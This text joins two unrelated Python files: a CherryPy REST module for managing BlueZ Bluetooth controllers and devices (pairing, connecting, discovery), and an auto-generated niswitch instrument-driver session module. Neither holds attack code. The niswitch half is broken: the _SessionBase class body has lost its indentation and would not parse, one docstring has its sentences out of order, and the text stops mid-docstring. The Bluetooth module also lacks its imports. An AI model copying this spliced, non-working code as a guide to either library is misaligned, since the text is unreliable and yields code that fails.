# TODO: USER_PERMISSION_TYPES for Bluetooth

# Timeout (seconds) for the blocking D-Bus Pair() call on a device.
PAIR_TIMEOUT_SECONDS = 60

# These device properties can be directly set, without requiring any special-case logic.
# Each entry is (BlueZ property name, Python type used for D-Bus conversion).
SETTABLE_DEVICE_PROPS = [("Trusted", bool)]

# These controller properties can be directly set, without requiring any special-case logic.
PASS_ADAPTER_PROPS = ["Discovering", "Powered", "Discoverable"]

# Optional device-command plugins, populated by the import guards below.
bluetooth_plugins: List[weblcm_bluetooth_plugin.BluetoothPlugin] = []
# Optional plugins: each is loaded best-effort at import time; a missing
# module is logged and simply leaves that plugin out of bluetooth_plugins.
try:
    from weblcm_hid_barcode_scanner import HidBarcodeScannerPlugin
    bluetooth_plugins.append(HidBarcodeScannerPlugin())
    cherrypy.log("weblcm_bluetooth: HidBarcodeScannerPlugin loaded")
except ImportError:
    cherrypy.log("weblcm_bluetooth: HidBarcodeScannerPlugin NOT loaded")

try:
    from weblcm_vsp_connection import VspConnectionPlugin
    bluetooth_plugins.append(VspConnectionPlugin())
    cherrypy.log("weblcm_bluetooth: VspConnectionPlugin loaded")
except ImportError:
    cherrypy.log("weblcm_bluetooth: VspConnectionPlugin NOT loaded")
def GetControllerObj(name: Optional[str] = None):
    """Look up a Bluetooth controller (adapter) proxy object on the system bus.

    :param name: controller name (e.g. 'hci0'), or None for the default
        controller as chosen by find_controller.
    :return: tuple (bus, controller_obj, result) where controller_obj is the
        D-Bus proxy object or None if not found, and result carries the
        error info ('SDCERR'/'InfoMsg') for the not-found case.
    """
    result = {}
    # get the system bus
    bus = dbus.SystemBus()
    # get the ble controller
    controller = find_controller(bus, name)
    if not controller:
        result['InfoMsg'] = f"Controller {controller_pretty_name(name)} not found."
        result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
        controller_obj = None
    else:
        controller_obj = bus.get_object(BLUEZ_SERVICE_NAME, controller)
    return bus, controller_obj, result
@cherrypy.expose
@cherrypy.popargs('controller', 'device')
class Bluetooth(object):
    """CherryPy REST resource exposing Bluetooth controllers and devices.

    URL positional args (via popargs): /bluetooth/<controller>/<device>.
    GET reports controller/device state; PUT changes adapter or device
    properties or executes plugin device commands.
    """

    def __init__(self):
        # Per-controller cached state (currently only the discovery
        # 'Transport' filter), keyed by controller name ('hciX').
        self.controller_state = {}

    @cherrypy.tools.json_out()
    def GET(self, *args, **kwargs):
        """Return state for one or all controllers, or for a single device.

        Query params: 'filter' (comma-separated result keys), 'controller'
        ('controllerX' form, translated to 'hciX'), 'device' (device URI,
        translated to a UUID).
        """
        result = {
            'SDCERR': weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1),
            'InfoMsg': '',
        }
        filters: Optional[List[str]] = None
        if 'filter' in cherrypy.request.params:
            filters = cherrypy.request.params['filter'].split(",")
        if 'controller' in cherrypy.request.params:
            # External naming is 'controller0'; BlueZ uses 'hci0'.
            controller_name = cherrypy.request.params['controller'].replace("controller", "hci")
        else:
            controller_name = None
        if 'device' in cherrypy.request.params:
            device_uuid = uri_to_uuid(cherrypy.request.params['device'])
        else:
            device_uuid = None
        # get the system bus
        bus = dbus.SystemBus()
        # get the ble controller
        if controller_name is not None:
            controller = find_controller(bus, controller_name)
            controllers = [controller]
            if not controller:
                result['InfoMsg'] = f"Controller {controller_pretty_name(controller_name)} not found."
                return result
        else:
            # No controller specified: report on every controller found.
            controllers = find_controllers(bus)
        for controller in controllers:
            # Convert the BlueZ object path back to the external name,
            # e.g. '/org/bluez/hci0' -> 'controller0'.
            controller_friendly_name: str = controller.replace("hci", "controller").replace("/org/bluez/", "")
            controller_result = {}
            controller_obj = bus.get_object(BLUEZ_SERVICE_NAME, controller)
            if not controller_obj:
                result['InfoMsg'] = f"Controller {controller_pretty_name(controller_name)} not found."
                return result
            try:
                matched_filter = False
                if not device_uuid:
                    # Controller-level report, honoring the optional filters.
                    if not filters or 'bluetoothDevices' in filters:
                        controller_result['bluetoothDevices'] = find_devices(bus)
                        matched_filter = True
                    adapter_props = dbus.Interface(controller_obj, "org.freedesktop.DBus.Properties")
                    # NOTE(review): adapter_methods is assigned but never used
                    # in GET — looks vestigial; confirm before removing.
                    adapter_methods = dbus.Interface(controller_obj, "org.freedesktop.DBus.Methods")
                    if not filters or 'transportFilter' in filters:
                        controller_result['transportFilter'] = self.get_adapter_transport_filter(
                            controller_name)
                        matched_filter = True
                    for pass_property in PASS_ADAPTER_PROPS:
                        if not filters or pass_property.lower() in filters:
                            controller_result[pass_property.lower()] = adapter_props.Get(ADAPTER_IFACE, pass_property)
                            matched_filter = True
                    result[controller_friendly_name] = controller_result
                    if filters and not matched_filter:
                        # Caller asked only for keys this handler doesn't know.
                        result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
                        result['InfoMsg'] = f"filters {filters} not matched"
                        return result
                else:
                    # Device-level report: merge the device's properties
                    # directly into the top-level result.
                    result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
                    device, device_props = find_device(bus, device_uuid)
                    if not device:
                        result['InfoMsg'] = 'Device not found'
                        return result
                    result.update(device_props)
                result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
            except Exception as e:
                # Best-effort: record the error and keep the partial result.
                result['InfoMsg'] = str(e)
                cherrypy.log(str(e))
        return result

    @cherrypy.tools.json_in()
    @cherrypy.tools.accept(media='application/json')
    @cherrypy.tools.json_out()
    def PUT(self, *args, **kwargs):
        """Set adapter properties, set device properties, or run a plugin
        device command, depending on URL params and the JSON body."""
        result = {
            'SDCERR': weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1),
            'InfoMsg': '',
        }
        if 'controller' in cherrypy.request.params:
            controller_name = cherrypy.request.params['controller'].replace("controller", "hci")
        else:
            controller_name = None
        if 'device' in cherrypy.request.params:
            device_uuid = uri_to_uuid(cherrypy.request.params['device'])
        else:
            device_uuid = None
        post_data = cherrypy.request.json
        bus, adapter_obj, get_controller_result = GetControllerObj(controller_name)
        result.update(get_controller_result)
        if not adapter_obj:
            # Controller lookup failed; result already carries the error.
            return result
        try:
            adapter_props = dbus.Interface(adapter_obj, "org.freedesktop.DBus.Properties")
            adapter_methods = dbus.Interface(adapter_obj, "org.freedesktop.DBus.Methods")
            if not device_uuid:
                # Adapter-level update (powered/discoverable/discovering/...).
                result.update(self.set_adapter_properties(adapter_methods, adapter_props,
                                                          controller_name, post_data))
            else:
                # device_uuid specified
                device, device_props = find_device(bus, device_uuid)
                if device is None:
                    result['InfoMsg'] = 'Device not found'
                    return result
                device_obj = bus.get_object(BLUEZ_SERVICE_NAME, device)
                device_methods = dbus.Interface(device_obj, "org.freedesktop.DBus.Methods")
                device_properties = dbus.Interface(device_obj, "org.freedesktop.DBus.Properties")
                if 'command' in post_data:
                    # Plugin-handled command (e.g. VSP connection, barcode scanner).
                    command = post_data['command']
                    result.update(self.execute_device_command(bus, command, device_uuid, device))
                    return result
                else:
                    result = self.set_device_properties(adapter_methods, device_methods, device_obj, device_properties,
                                                        post_data)
        except Exception as e:
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
            result['InfoMsg'] = str(e)
            cherrypy.log(str(e))
        return result

    def set_adapter_properties(self, adapter_methods, adapter_props, controller_name, post_data):
        """Set properties on an adapter (controller)"""
        result = {}
        powered = post_data.get('powered', None)
        discovering = post_data.get('discovering', None)
        discoverable = post_data.get('discoverable', None)
        transport_filter = post_data.get('transportFilter', None)
        if powered is not None:
            adapter_props.Set(ADAPTER_IFACE, "Powered", dbus.Boolean(powered))
            if not powered:
                # Do not attempt to set discoverable or discovering state if powering off
                # NOTE(review): these expressions only null out *falsy* values;
                # a truthy discoverable/discovering request is still attempted
                # while powering off, which seems to contradict the comment
                # above — confirm the intended behavior.
                discoverable = discoverable if discoverable else None
                discovering = discovering if discovering else None
        if discoverable is not None:
            adapter_props.Set(ADAPTER_IFACE, "Discoverable", dbus.Boolean(discoverable))
        if transport_filter is not None:
            result.update(self.set_adapter_transport_filter(adapter_methods, controller_name,
                                                            transport_filter))
        if discovering is not None:
            # Only start/stop discovery when the requested state differs from
            # the adapter's current state.
            discovering_state = adapter_props.Get(ADAPTER_IFACE, "Discovering")
            if discovering_state != discovering:
                if discovering:
                    adapter_methods.get_dbus_method("StartDiscovery", ADAPTER_IFACE)()
                else:
                    adapter_methods.get_dbus_method("StopDiscovery", ADAPTER_IFACE)()
        if 'SDCERR' not in result:
            # Nothing above reported an error (set_adapter_transport_filter
            # may have set SDCERR on failure).
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
        return result

    def get_adapter_transport_filter(self, controller_name):
        """Return the cached discovery transport filter for a controller, or
        None if one was never set through this API."""
        if controller_name in self.controller_state and 'Transport' in self.controller_state[
                controller_name]:
            return self.controller_state[controller_name]['Transport']
        else:
            return None

    def set_adapter_transport_filter(self, adapter_methods, controller_name, transport_filter):
        """ Set a transport filter on the controller. Note that "When multiple clients call
        SetDiscoveryFilter, their filters are internally merged" """
        result = {}
        discovery_filters = {'Transport': transport_filter}
        discovery_filters_dbus = python_to_dbus(discovery_filters)
        try:
            adapter_methods.get_dbus_method("SetDiscoveryFilter", ADAPTER_IFACE)(discovery_filters_dbus)
        except dbus.DBusException as e:
            # BlueZ rejected the filter value (e.g. not 'auto'/'bredr'/'le').
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
            result['InfoMsg'] = f"Transport filter {transport_filter} not accepted"
            return result
        # Cache the accepted filter so GET can report it later.
        if not controller_name in self.controller_state:
            self.controller_state[controller_name] = {}
        self.controller_state[controller_name]['Transport'] = transport_filter
        return result

    def set_device_properties(self, adapter_methods, device_methods, device_obj, device_properties, post_data):
        """Apply requested property changes (trusted/paired/connected/passkey)
        to a single device."""
        result = {}
        # Simple pass-through properties (see SETTABLE_DEVICE_PROPS).
        for settable_property in SETTABLE_DEVICE_PROPS:
            prop_name, prop_type = settable_property
            value = post_data.get(prop_name.lower(), None)
            if value is not None:
                device_properties.Set(DEVICE_IFACE, prop_name, python_to_dbus(
                    value, prop_type))
        paired = post_data.get('paired', None)
        if paired == 1:
            paired_state = device_properties.Get(DEVICE_IFACE, "Paired")
            if paired_state != paired:
                # Instantiating AgentSingleton registers the pairing agent so
                # BlueZ can complete pairing; the local name is unused.
                agent = AgentSingleton()
                bus = dbus.SystemBus()
                # Blocking Pair() call with an explicit timeout.
                bus.call_blocking(bus_name=BLUEZ_SERVICE_NAME, object_path=device_obj.object_path,
                                  dbus_interface=DEVICE_IFACE,
                                  method="Pair", signature='', args=[],
                                  timeout=PAIR_TIMEOUT_SECONDS)
        elif paired == 0:
            adapter_methods.get_dbus_method("RemoveDevice", ADAPTER_IFACE)(device_obj)
            # If RemoveDevice is successful, further work on device will not be possible.
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
            return result
        connected = post_data.get('connected', None)
        connected_state = device_properties.Get(DEVICE_IFACE, "Connected")
        if connected_state != connected:
            if connected == 1:
                # Note - device may need to be paired prior to connecting
                # AgentSingleton can be registered to allow BlueZ to auto-pair (without bonding)
                agent = AgentSingleton()
                device_methods.get_dbus_method("Connect", DEVICE_IFACE)()
            elif connected == 0:
                device_methods.get_dbus_method("Disconnect", DEVICE_IFACE)()
        passkey = post_data.get('passkey', None)
        if passkey is not None:
            # Stash the passkey on the agent so it can answer BlueZ's
            # RequestPasskey callback for this device.
            agent_instance = AgentSingleton.get_instance()
            if agent_instance:
                agent_instance.passkeys[device_obj.object_path] = passkey
        # Found device, set any requested properties.  Assume success.
        result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
        return result

    def execute_device_command(self, bus, command, device_uuid: str, device: dbus.ObjectPath):
        """Dispatch a device command to the first plugin that handles it.

        A plugin signals handling via its 'processed' return value; a plugin
        exception is treated as handled-with-error.
        """
        result = {}
        error_message = None
        processed = False
        post_data = cherrypy.request.json
        for plugin in bluetooth_plugins:
            try:
                processed, error_message = plugin.ProcessDeviceCommand(bus, command, device_uuid,
                                                                       device, post_data)
            except Exception as e:
                processed = True
                error_message = f"Command {command} failed with {str(e)}"
                break
            if processed:
                break
        if not processed:
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
            result['InfoMsg'] = f"Unrecognized command {command}"
        elif error_message:
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
            result['InfoMsg'] = error_message
        else:
            result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
        return result
# --- end of weblcm_bluetooth module ---
# <gh_stars>1-10
# -*- coding: utf-8 -*-
# This file was generated
import array # noqa: F401
import ctypes
import datetime # noqa: F401
# Used by @ivi_synchronized
from functools import wraps
import niswitch._attributes as _attributes
import niswitch._converters as _converters
import niswitch._library_singleton as _library_singleton
import niswitch._visatype as _visatype
import niswitch.enums as enums
import niswitch.errors as errors
# Used for __repr__
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Helper functions for creating ctypes needed for calling into the driver DLL
def get_ctypes_pointer_for_buffer(value=None, library_type=None, size=None):
    """Return a ctypes object the driver DLL can read from / write into.

    Accepts an array.array (zero-copy cast to a pointer), a numpy.ndarray
    (converted in place via numpy.ctypeslib), or a list (copied into a new
    ctypes array). With no value, allocates a zeroed ctypes array of
    *library_type* x *size*, or returns None if either is missing.
    """
    # array.array: cast its existing buffer without copying.
    if isinstance(value, array.array):
        assert library_type is not None, 'library_type is required for array.array'
        address, _ = value.buffer_info()
        return ctypes.cast(address, ctypes.POINTER(library_type))

    # numpy.ndarray: detected by type-name string so numpy is only imported
    # when the caller actually passed an ndarray.
    if "'numpy.ndarray'" in str(type(value)):
        import numpy
        return numpy.ctypeslib.as_ctypes(value)

    # Plain list: copy the elements into a freshly allocated ctypes array.
    if isinstance(value, list):
        assert library_type is not None, 'library_type is required for list'
        return (library_type * len(value))(*value)

    # No incoming data: hand back a zero-initialized output buffer when we
    # know both the element type and the element count.
    if library_type is not None and size is not None:
        return (library_type * size)()
    return None
def get_ctypes_and_array(value, array_type):
    """Normalize *value* into an array.array of typecode *array_type*.

    Returns the value unchanged if it is already an array.array, None if it
    is None, and otherwise a new array.array built from the iterable.
    """
    if value is None:
        return None
    if isinstance(value, array.array):
        # Already in the desired representation; reuse it as-is.
        return value
    return array.array(array_type, value)
class _Scan(object):
    """Context manager pairing scan initiation with a guaranteed abort.

    Constructing it starts the scan immediately; leaving the ``with`` block
    (normally or via exception) calls abort() on the session.
    """
    def __init__(self, session):
        self._session = session
        # Start the scan as soon as the context object is created.
        self._session._initiate_scan()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Always stop the scan, even if the body raised.
        self._session.abort()
# From https://stackoverflow.com/questions/5929107/decorators-with-parameters
def ivi_synchronized(f):
    """Decorator that runs *f* while holding the session's lock.

    The first positional argument is assumed to be the session object
    (``self``), whose lock() returns a context manager.
    """
    @wraps(f)
    def locked_call(*args, **kwargs):
        # Parameter 0 is 'self' — the session object that owns the lock.
        session = args[0]
        with session.lock():
            return f(*args, **kwargs)
    return locked_call
class _Lock(object):
    """Context manager that unlocks the session on exit.

    Acquisition is NOT done here — _lock_session is called by the session's
    lock() method before this object is returned; this object only
    guarantees the matching unlock().
    """
    def __init__(self, session):
        self._session = session

    def __enter__(self):
        # _lock_session is called from the lock() function, not here
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self._session.unlock()
class _RepeatedCapabilities(object):
    """Indexable container exposing repeated capabilities (e.g. channels).

    ``session.channels['0,1']`` returns a _SessionBase view scoped to the
    selected capabilities; sets/gets/method calls on that view apply only
    to them.
    """
    def __init__(self, session, prefix):
        self._session = session
        # Prefix prepended to each capability name (e.g. 'channel').
        self._prefix = prefix

    def __getitem__(self, repeated_capability):
        '''Set/get properties or call methods with a repeated capability (i.e. channels)'''
        # Expand slices/lists/ranges into the driver's comma-separated form.
        rep_caps_list = _converters.convert_repeated_capabilities(repeated_capability, self._prefix)
        return _SessionBase(vi=self._session._vi, repeated_capability_list=rep_caps_list, library=self._session._library, encoding=self._session._encoding, freeze_it=True)
# This is a very simple context manager we can use when we need to set/get attributes
# or call functions from _SessionBase that require no channels. It is tied to the specific
# implementation of _SessionBase and how repeated capabilities are handled.
class _NoChannel(object):
    """Temporarily clears the session's repeated-capability selection so an
    attribute access or call applies to the whole device, restoring the
    previous selection on exit."""
    def __init__(self, session):
        self._session = session

    def __enter__(self):
        # Save the current selection and blank it for the duration.
        self._repeated_capability_cache = self._session._repeated_capability
        self._session._repeated_capability = ''

    def __exit__(self, exc_type, exc_value, traceback):
        self._session._repeated_capability = self._repeated_capability_cache
class _SessionBase(object):
'''Base class for all NI-SWITCH sessions.'''
# This is needed during __init__. Without it, __setattr__ raises an exception
_is_frozen = False
analog_bus_sharing_enable = _attributes.AttributeViBoolean(1150018)
'''Type: bool
Enables or disables sharing of an analog bus line so that multiple NI SwitchBlock devices may connect to it simultaneously. To enable multiple NI SwitchBlock devices to share an analog bus line, set this property to True for each device on the channel that corresponds with the shared analog bus line. The default value for all devices is False, which disables sharing of the analog bus.
Refer to the Using the Analog Bus on an NI SwitchBlock Carrier topic in the NI Switches Help for more information about sharing the analog bus.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].analog_bus_sharing_enable = var
var = session.channels[0,1].analog_bus_sharing_enable
'''
bandwidth = _attributes.AttributeViReal64(1250005)
'''Type: float
This channel-based property returns the bandwidth for the channel.
The units are hertz.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].bandwidth
'''
channel_count = _attributes.AttributeViInt32(1050203)
'''Type: int
Indicates the number of channels that the specific instrument driver supports.
'''
characteristic_impedance = _attributes.AttributeViReal64(1250016)
'''Type: float
This channel-based property returns the characteristic impedance for the channel.
The units are ohms.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].characteristic_impedance
'''
continuous_scan = _attributes.AttributeViBoolean(1250026)
'''Type: bool
When a switch device is scanning, the swich can either stop scanning when the end of the scan (False) or continue scanning from the top of the scan list again (True).
Notice that if you set the scan to continuous (True), the Wait For Scan Complete operation will always time out and you must call Abort to stop the scan.
'''
digital_filter_enable = _attributes.AttributeViBoolean(1150016)
'''Type: bool
This property specifies whether to apply the pulse width filter to the Trigger Input. Enabling the Digital Filter (True) prevents the switch module from being triggered by pulses that are less than 150 ns on PXI trigger lines 0–7.
When Digital Filter is disabled (False), it is possible for the switch module to be triggered by noise on the PXI trigger lines. If the device triggering the switch is capable of sending pulses greater than 150 ns, you should not disable the Digital Filter.
'''
driver_setup = _attributes.AttributeViString(1050007)
'''Type: str
This property indicates the Driver Setup string that the user specified when initializing the driver.
Some cases exist where the end-user must specify instrument driver options at initialization time. An example of this is specifying a particular instrument model from among a family of instruments that the driver supports. This is useful when using simulation. The end-user can specify driver-specific options through the DriverSetup keyword in the optionsString parameter to the InitWithOptions method, or through the IVI Configuration Utility.
If the user does not specify a Driver Setup string, this property returns an empty string.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
handshaking_initiation = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.HandshakingInitiation, 1150013)
instrument_firmware_revision = _attributes.AttributeViString(1050510)
'''Type: str
A string that contains the firmware revision information for the instrument you are currently using.
'''
instrument_manufacturer = _attributes.AttributeViString(1050511)
'''Type: str
A string that contains the name of the instrument manufacturer you are currently using.
'''
instrument_model = _attributes.AttributeViString(1050512)
'''Type: str
A string that contains the model number or name of the instrument that you are currently using.
'''
io_resource_descriptor = _attributes.AttributeViString(1050304)
'''Type: str
Indicates the resource descriptor the driver uses to identify the physical device.
If you initialize the driver with a logical name, this property contains the resource descriptor that corresponds to the entry in the IVI Configuration utility.
If you initialize the instrument driver with the resource descriptor, this property contains that value.
'''
is_configuration_channel = _attributes.AttributeViBoolean(1250003)
'''Type: bool
This channel-based property specifies whether to reserve the channel for internal path creation. A channel that is available for internal path creation is called a configuration channel. The driver may use configuration channels to create paths between two channels you specify in the connect method. Configuration channels are not available for external connections.
Set this property to True to mark the channel as a configuration channel. Set this property to False to mark the channel as available for external connections.
After you identify a channel as a configuration channel, you cannot use that channel for external connections. The connect method returns the NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL error when you attempt to establish a connection between a configuration channel and any other channel.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].is_configuration_channel = var
var = session.channels[0,1].is_configuration_channel
'''
is_debounced = _attributes.AttributeViBoolean(1250002)
'''Type: bool
This property indicates whether the entire switch device has settled since the last switching command. A value of True indicates that all signals going through the switch device are valid.
'''
is_scanning = _attributes.AttributeViBoolean(1250024)
'''Type: bool
If True, the switch module is currently scanning through the scan list (i.e. it is not in the Idle state). If False, the switch module is not currently scanning through the scan list (i.e. it is in the Idle state).
'''
is_source_channel = _attributes.AttributeViBoolean(1250001)
'''Type: bool
This channel-based property specifies whether you want to identify the channel as a source channel. Typically, you set this property to True when you attach the channel to a power supply, a method generator, or an active measurement point on the unit under test, and you do not want to connect the channel to another source. The driver prevents source channels from connecting to each other. The connect method returns the NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES when you attempt to connect two channels that you identify as source channels.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].is_source_channel = var
var = session.channels[0,1].is_source_channel
'''
is_waiting_for_trig = _attributes.AttributeViBoolean(1150004)
'''Type: bool
In a scan list, a semi-colon (;) is used to indicate that at that point in the scan list, the scan engine should pause until a trigger is received from the trigger input. If that trigger is user generated through either a hardware pulse or the Send SW Trigger operation, it is necessary for the user to know when the scan engine has reached such a state.
'''
logical_name = _attributes.AttributeViString(1050305)
'''Type: str
A string containing the logical name you specified when opening the current IVI session.
You may pass a logical name to the init or InitWithOptions methods. The IVI Configuration utility must contain an entry for the logical name. The logical name entry refers to a virtual instrument section in the IVI Configuration file. The virtual instrument section specifies a physical device and initial user options.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
max_ac_voltage = _attributes.AttributeViReal64(1250007)
'''Type: float
This channel-based property returns the maximum AC voltage the channel can switch.
The units are volts RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_ac_voltage
'''
max_carry_ac_current = _attributes.AttributeViReal64(1250011)
'''Type: float
This channel-based property returns the maximum AC current the channel can carry.
The units are amperes RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_ac_current
'''
max_carry_ac_power = _attributes.AttributeViReal64(1250015)
'''Type: float
This channel-based property returns the maximum AC power the channel can carry.
The units are volt-amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_ac_power
'''
max_carry_dc_current = _attributes.AttributeViReal64(1250010)
'''Type: float
This channel-based property returns the maximum DC current the channel can carry.
The units are amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_dc_current
'''
max_carry_dc_power = _attributes.AttributeViReal64(1250014)
'''Type: float
This channel-based property returns the maximum DC power the channel can carry.
The units are watts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_dc_power
'''
max_dc_voltage = _attributes.AttributeViReal64(1250006)
'''Type: float
This channel-based property returns the maximum DC voltage the channel can switch.
The units are volts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_dc_voltage
'''
max_switching_ac_current = _attributes.AttributeViReal64(1250009)
'''Type: float
This channel-based property returns the maximum AC current the channel can switch.
The units are amperes RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_ac_current
'''
max_switching_ac_power = _attributes.AttributeViReal64(1250013)
'''Type: float
This channel-based property returns the maximum AC power the channel can switch.
The units are volt-amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_ac_power
'''
max_switching_dc_current = _attributes.AttributeViReal64(1250008)
'''Type: float
This channel-based property returns the maximum DC current the channel can switch.
The units are amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_dc_current
'''
max_switching_dc_power = _attributes.AttributeViReal64(1250012)
'''Type: float
This channel-based property returns the maximum DC power the channel can switch.
The units are watts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_dc_power
'''
number_of_relays = _attributes.AttributeViInt32(1150014)
'''Type: int
This property returns the number of relays.
'''
num_of_columns = _attributes.AttributeViInt32(1250019)
'''Type: int
This property returns the number of channels on the column of a matrix or scanner. If the switch device is a scanner, this value is the number of input channels.
The wire_mode property affects the number of available columns. For example, if your device has 8 input lines and you use the four-wire mode, then the number of columns you have available is 2.
'''
num_of_rows = _attributes.AttributeViInt32(1250018)
'''Type: int
This property returns the number of channels on the row of a matrix or scanner. If the switch device is a scanner, this value is the number of output channels.
The wire_mode property affects the number of available rows. For example, if your device has 8 input lines and you use the two-wire mode, then the number of columns you have available is 4.
'''
power_down_latching_relays_after_debounce = _attributes.AttributeViBoolean(1150017)
'''Type: bool
This property specifies whether to power down latching relays after calling Wait For Debounce.
When Power Down Latching Relays After Debounce is enabled (True), a call to Wait For Debounce ensures that the relays are settled and the latching relays are powered down.
'''
scan_advanced_output = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanAdvancedOutput, 1250023)
'''Type: enums.ScanAdvancedOutput
This property specifies the method you want to use to notify another instrument that all signals going through the switch device have settled following the processing of one entry in the scan list.
'''
scan_advanced_polarity = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanAdvancedPolarity, 1150011)
scan_delay = _attributes.AttributeViReal64TimeDeltaSeconds(1250025)
'''Type: float in seconds or datetime.timedelta
This property specifies the minimum amount of time the switch device waits before it asserts the scan advanced output trigger after opening or closing the switch. The switch device always waits for debounce before asserting the trigger. The units are seconds.
the greater value of the settling time and the value you specify as the scan delay.
Note: NI PXI-2501/2503/2565/2590/2591 Users--the actual delay will always be
'''
scan_list = _attributes.AttributeViString(1250020)
'''Type: str
This property contains a scan list, which is a string that specifies channel connections and trigger conditions. The initiate method makes or breaks connections and waits for triggers according to the instructions in the scan list.
The scan list is comprised of channel names that you separate with special characters. These special characters determine the operations the scanner performs on the channels when it executes this scan list.
To create a path between two channels, use the following character between the two channel names:
-> (a dash followed by a '>' sign)
Example: 'CH1->CH2' tells the switch to make a path from channel CH1 to channel CH2.
To break or clear a path, use the following character as a prefix before the path:
~ (tilde)
Example: '~CH1->CH2' tells the switch to break the path from channel CH1 to channel CH2.
To tell the switch device to wait for a trigger event, use the following character as a separator between paths:
; (semi-colon)
Example: 'CH1->CH2;CH3->CH4' tells the switch to make the path from channel CH1 to channel CH2, wait for a trigger, and then make the path from CH3 to CH4.
'''
scan_mode = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanMode, 1250021)
'''Type: enums.ScanMode
